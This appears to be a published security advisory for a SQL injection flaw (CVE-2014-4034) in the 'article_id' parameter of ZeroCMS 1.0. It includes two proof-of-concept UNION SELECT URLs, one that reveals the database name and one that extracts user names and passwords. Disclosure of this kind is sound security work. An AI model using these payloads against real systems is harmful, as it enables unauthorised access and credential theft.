ZeroCMS 1.0 SQL Injection

2014-06-10 / 2014-06-18
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2014-4034
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

ZeroCMS 1.0 (article_id) SQL Injection Vulnerability Vendor: Another Awesome Stuff Product web page: http://www.aas9.in/zerocms/ Affected version: 1.0 Summary: ZeroCMS is a very simple Content Management System built using PHP and MySQL. Desc: Input passed via the 'article_id' GET parameter to zero_view_article.php script is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Apache/2.4.7 (Win32) PHP/5.5.6 MySQL 5.6.14 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5186 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5186.php 09.06.2014 -- http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+concat(unhex(hex(cast(database()+as+char)))),2,3,4,5,6-- http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+(select+concat(unhex(hex(cast(zero_users.name+as+char))),0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit 0,1),2,3,4,5,6--

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5186.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top